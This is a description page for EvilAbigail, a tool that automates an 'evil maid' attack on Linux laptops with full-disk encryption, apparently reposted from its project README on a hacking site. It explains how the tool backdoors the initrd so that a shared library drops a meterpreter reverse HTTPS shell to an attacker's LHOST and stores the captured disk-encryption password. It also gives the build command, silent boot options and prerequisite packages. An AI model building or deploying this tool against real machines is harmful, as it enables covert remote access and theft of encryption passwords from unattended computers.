EvilAbigail - Automated Linux evil maid attack | HACK4NET

Scenario

Laptop left turned off with FDE turned on
Attacker boots from USB/CD/Network
Script executes and backdoors initrd
User returns to laptop, boots as normal
Backdoored initrd loads:
- (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
- (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

Ubuntu 14.04.3
Debian 8.2.0
Kali 2.0
Fedora 23
CentOS 7

Current Features

python/meterpreter/reverse_https to compile time LHOST
FDE decryption password stored in meterpreter environment (getenv PASSWORD)

Details

Compiling

See the Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.

Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

isolinux.cfg

The following options have been appended to the kernel boot:

mc superuser nodhcp quiet loglevel=0

Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing

Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)

Prerequisites

core.d is an unpacked core.gz from TinyCore with the below packages merged in.

Core-current is an unpacked Core-current.iso

The following packages have been installed inside tinycore (python, filesystem support):

bzip2-lib.tcz
filesystems-3.16.6-tinycore.tcz
gdbm.tcz
libffi.tcz
mtd-3.16.6-tinycore.tcz
ncurses.tcz
openssl.tcz
python.tcz
readline.tcz
sqlite3.tcz

Github Project